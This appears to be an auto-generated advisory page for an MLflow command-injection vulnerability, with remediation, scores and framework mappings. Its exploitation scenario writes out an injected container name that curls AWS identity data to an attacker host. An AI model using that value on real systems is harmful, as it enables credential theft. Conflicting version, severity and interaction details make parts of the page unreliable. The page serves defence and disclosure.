CVE-2025-14287: MLflow Code Injection enables RCE

Q: Is CVE-2025-14287 actively exploited?

No confirmed active exploitation of CVE-2025-14287 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2025-14287?

1) PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation. 2) DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter. 3) WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+ $). 4) HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment. 5) AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.

Q: What systems are affected by CVE-2025-14287?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms (MLflow-based), CI/CD pipelines for ML, Cloud ML deployments (AWS SageMaker), Model serving infrastructure, Training and deployment pipelines.

Q: What is the CVSS score for CVE-2025-14287?

CVE-2025-14287 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 1.24%.

CISO Take

MLflow users on any version before 3.7.0 deploying to AWS SageMaker are exposed to command injection via unsanitized container image names passed to os.system(). Patch immediately to v3.7.0+ and audit CI/CD pipelines that accept external input for the --container parameter. Until patched, restrict who can invoke MLflow SageMaker CLI commands and treat any container name input from untrusted sources as hostile.

What is the risk?

HIGH risk despite absent CVSS score. Command injection via os.system() is a well-understood, reliable attack primitive — exploitation requires no special skills. The attack surface is broad: MLflow is pervasive in MLOps pipelines, and the vulnerable code path (SageMaker deployment) is a common production workflow. CI/CD pipelines that dynamically construct container image names from external sources (Git tags, webhook payloads, PR metadata) are the highest-risk targets. Privileges escalated depend on the process context — in containerized CI environments, impact is potentially full host compromise if combined with container escape.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
MLflow	pip	< 3.8.0rc0	`3.8.0rc0`
26.6K OpenSSF 5.6 655 dependents Pushed 4d ago 31% patched ~51d to patch Full package profile →

Do you use MLflow? You're affected.

How severe is it?

CVSS 3.1

7.5 / 10

EPSS

1.2%

chance of exploitation in 30 days

Higher than 65% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Advanced

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC High

PR None

UI Required

S Unchanged

C High

I High

A High

What should I do?

1 step

1) PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation. 2) DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter. 3) WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+ $). 4) HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment. 5) AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Supply Chain Model Poisoning Code Execution Framework Model AML.T0010.001 - AI Software AML.T0010.004 - Container Registry AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0055 - Unsecured Credentials AML.T0105 - Escape to Host

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

8.2 - AI risk assessment 8.4 - AI system operation and monitoring A.6.2.6 - Security of AI system

NIST AI RMF

GOVERN-1.7 - Organizational teams are committed to a culture that considers and communicates AI risk MANAGE 2.2 - Mechanisms for tracking and managing AI risks MANAGE-2.2 - Mechanisms to sustain the value of deployed AI with ongoing maintenance

OWASP LLM Top 10

LLM05:2025 - Supply Chain Vulnerabilities LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-14287?

MLflow users on any version before 3.7.0 deploying to AWS SageMaker are exposed to command injection via unsanitized container image names passed to os.system(). Patch immediately to v3.7.0+ and audit CI/CD pipelines that accept external input for the --container parameter. Until patched, restrict who can invoke MLflow SageMaker CLI commands and treat any container name input from untrusted sources as hostile.

Is CVE-2025-14287 actively exploited?

No confirmed active exploitation of CVE-2025-14287 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-14287?

1) PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation. 2) DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter. 3) WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+ $). 4) HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment. 5) AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.

What systems are affected by CVE-2025-14287?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms (MLflow-based), CI/CD pipelines for ML, Cloud ML deployments (AWS SageMaker), Model serving infrastructure, Training and deployment pipelines.

What is the CVSS score for CVE-2025-14287?

CVE-2025-14287 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 1.24%.

What is the AI security impact?

Affected AI Architectures

MLOps platforms (MLflow-based)CI/CD pipelines for MLCloud ML deployments (AWS SageMaker)Model serving infrastructureTraining and deployment pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0010.004 Container Registry

AML.T0025 Exfiltration via Cyber Means

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0055 Unsecured Credentials

AML.T0105 Escape to Host

Compliance Controls Affected

EU AI Act: Article 15, Article 9

ISO 42001: 8.2, 8.4, A.6.2.6

NIST AI RMF: GOVERN-1.7, MANAGE 2.2, MANAGE-2.2

OWASP LLM Top 10: LLM05:2025, LLM06:2025

What are the technical details?

Original Advisory

A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments.

Exploitation Scenario

An adversary with write access to a Git repository (via compromised developer credentials or a malicious PR) modifies the CI/CD pipeline configuration to pass a crafted container image name such as legitimate-image:latest; curl -s http://attacker.com/$(aws sts get-caller-identity | base64) to the MLflow SageMaker deployment command. When the pipeline triggers, MLflow interpolates the unsanitized string directly into an os.system() call, executing the injected command in the context of the CI runner. The attacker receives AWS caller identity (credentials), then uses them to access S3 model buckets, enumerate SageMaker endpoints, and exfiltrate or replace production model artifacts. No user interaction beyond the normal pipeline execution is required.

Weaknesses (CWE)

CWE-94 Improper Control of Generation of Code ('Code Injection') Primary CWE-94 Improper Control of Generation of Code ('Code Injection') Primary

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

[Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
[Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.